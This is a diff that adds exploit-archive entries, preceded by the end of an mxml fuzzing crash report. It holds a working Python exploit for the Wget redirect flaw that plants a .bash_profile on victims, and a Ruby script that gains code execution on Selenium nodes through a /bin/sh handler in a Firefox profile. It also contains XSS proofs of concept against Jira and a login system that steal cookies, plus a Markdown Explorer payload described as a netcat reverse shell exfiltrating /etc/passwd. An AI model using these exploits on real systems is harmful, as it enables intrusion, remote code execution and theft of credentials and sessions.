+# 4.- Here are the crash backtrace. + +================================================================= +==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98 +READ of size 1 at 0x612000000a73 thread T0 + #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13 + #1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20 + #2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11 + #3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8 + #4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357) + #5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea) + #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0) + #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2) + #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 +#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529) + + +# 6.- Here are my testcase. + +#include +#include +#include +#include "mxml.h" + +extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { +std::string c(reinterpret_cast(data), size); +char *ptr; + +mxml_node_t *tree; + +tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK); + +if(tree){ + + ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK); + + if(!ptr) assert(false); + + mxmlDelete(tree); + +} + +return 0; + +} \ No newline at end of file diff --git a/exploits/linux/remote/49815.py b/exploits/linux/remote/49815.py new file mode 100755 index 000000000..4c734776d --- /dev/null +++ b/exploits/linux/remote/49815.py @@ -0,0 +1,54 @@ +# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) +# Original Exploit Author: Dawid Golunski +# Exploit Author: liewehacksie +# Version: GNU Wget < 1.18 +# CVE: CVE-2016-4971 + +import http.server +import socketserver +import socket +import sys + +class wgetExploit(http.server.SimpleHTTPRequestHandler): + + def do_GET(self): + # This takes care of sending .wgetrc/.bash_profile/$file + + print("We have a volunteer requesting " + self.path + " by GET :)\n") + if "Wget" not in self.headers.get('User-Agent'): + print("But it's not a Wget :( \n") + self.send_response(200) + self.end_headers() + self.wfile.write("Nothing to see here...") + return + + self.send_response(301) + print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n") + new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE) + + print("Sending redirect to %s \n"%(new_path)) + self.send_header('Location', new_path) + self.end_headers() + + +HTTP_LISTEN_IP = '192.168.72.2' +HTTP_LISTEN_PORT = 80 +FTP_HOST = '192.168.72.4' +FTP_PORT = 2121 +FILE = '.bash_profile' + +handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) + +print("Ready? Is your FTP server running?") + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +result = sock.connect_ex((FTP_HOST, FTP_PORT)) +if result == 0: + print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)) +else: + print("FTP is down :( Exiting.") + exit(1) + +print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT) + +handler.serve_forever() \ No newline at end of file diff --git a/exploits/linux/webapps/49915.rb b/exploits/linux/webapps/49915.rb new file mode 100755 index 000000000..432420b20 --- /dev/null +++ b/exploits/linux/webapps/49915.rb @@ -0,0 +1,79 @@ +# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) +# Date: 2021-05-27 +# Exploit Author: Jon Stratton +# Vendor Homepage: https://www.selenium.dev/ +# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar +# Version: 3.141.59 +# Tested on: Selenium Server 3.141.59, webdriver, geckodriver +# +# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb +# +# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started. +# +# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh” +# +# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system. +# +# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type. + +#!/usr/bin/env ruby + +require 'optparse' +require 'net/http' +require 'json' +require 'uri' +require 'zip' +require 'base64' + +options = {} +OptionParser.new do |opts| + opts.banner = 'Usage: example.rb [options]' + opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h| + options[:hub] = h + end + opts.on('--help', 'Prints this help') do + puts opts + exit + end +end.parse! + +hub_url = options[:hub] + +payload = 'rm -rf $0 +echo success > /tmp/selenium_node_rce.txt' + +# Build profile zip file. +stringio = Zip::OutputStream::write_buffer do |io| + # Create a handler for shell scripts + io.put_next_entry("handlers.json") + io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}') +end +stringio.rewind +encoded_profile = Base64.strict_encode64(stringio.sysread) + +# Create session with our new profile +newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}} + +uri = URI.parse(hub_url) +http = Net::HTTP.new(uri.host, uri.port) + +# Start session with encoded_profile and save session id for cleanup. +uri = URI.parse("%s/session" % [hub_url]) +request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') +request.body = JSON.generate(newSession) +response = http.request(request) +sessionId = JSON.parse(response.body)["value"]["sessionId"] + +# URL. +data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)] +uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId]) +request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') +request.body = JSON.generate(:url => data_url) +response = http.request(request) + +# End session(not working) +uri = URI.parse("%s/session/%s" % [hub_url, sessionId]) +request = Net::HTTP::Delete.new(uri.request_uri) +http.request(request) + +exit \ No newline at end of file diff --git a/exploits/macos/webapps/50068.txt b/exploits/macos/webapps/50068.txt new file mode 100644 index 000000000..9c0b234d8 --- /dev/null +++ b/exploits/macos/webapps/50068.txt @@ -0,0 +1,27 @@ +# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) +# Date: 06/05/2021 +# Exploit Author: CAPTAIN_HOOK +# Vendor Homepage: https://www.atlassian.com/ +# Software Link: https://www.atlassian.com/software/jira/download/data-center +# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1 +# Tested on: ANY +# CVE : CVE-2021-26078 + +Description: + +The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability +*Fixed versions:* + + - 8.5.14 + - 8.13.6 + - 8.16.1 + - 8.17.0 + +POC: + + - *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege +user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22 +Your XSS Will be triggered immediately. + +Reference: +https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21 \ No newline at end of file diff --git a/exploits/multiple/webapps/49367.txt b/exploits/multiple/webapps/49367.txt new file mode 100644 index 000000000..e6e20dc27 --- /dev/null +++ b/exploits/multiple/webapps/49367.txt @@ -0,0 +1,37 @@ +# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting +# Date: 30-12-2020 +# Exploit Author: Mesut Cetin +# Vendor Homepage: http://egavilanmedia.com +# Version: 1.0 +# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34 + +Vulnerable parameter: email, gender, username +Payload: + +Proof of Concept: + +To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps: + +1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php +2. Click above right on the "Profile" tab +3. Navigate to the "Edit Profile" tab +4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page. +5. Capture the POST request in Burp Suite and manipulate the parameter as shown: + +POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1 +Host: demo.egavilanmedia.com +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: de,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 180 +Origin: http://demo.egavilanmedia.com +Connection: close +Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php +Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e + +fullname=admin&username=&email=&gender==&action=update_admin + +6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like , the session cookies can be send to the attacker. \ No newline at end of file diff --git a/exploits/multiple/webapps/49826.js b/exploits/multiple/webapps/49826.js new file mode 100644 index 000000000..95afe07da --- /dev/null +++ b/exploits/multiple/webapps/49826.js @@ -0,0 +1,29 @@ +# Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE +# Exploit Author: TaurusOmar +# Date: 04/05/2021 +# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H +# Risk: High (8.8) +# Vendor Homepage: https://github.com/jersou/markdown-explorer +# Version: 0.1.1 +# Tested on: Windows, Linux, MacOs + +# Software Description: +Easily explore, view and edit markdown documentation of a file tree. +If your projects documentation is written in Markdown, with md files dispersed throughout your project tree, Markdown Explorer displays md files in a tree structure, and it allows filtering by file name or by file content. +Just drop a folder on the window (or click on the folder icon on top left) to show the Markdown documentation of this folder. Then, explore the tree on the left, and toggle view/edit mode on md file with the button on the top right. + + +# Vulnerability Description: +The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. +The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to +the remote attacker to get remote execution on the computer. + + +#Proof +https://imgur.com/a/w4bcPWs + + + +# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) + +[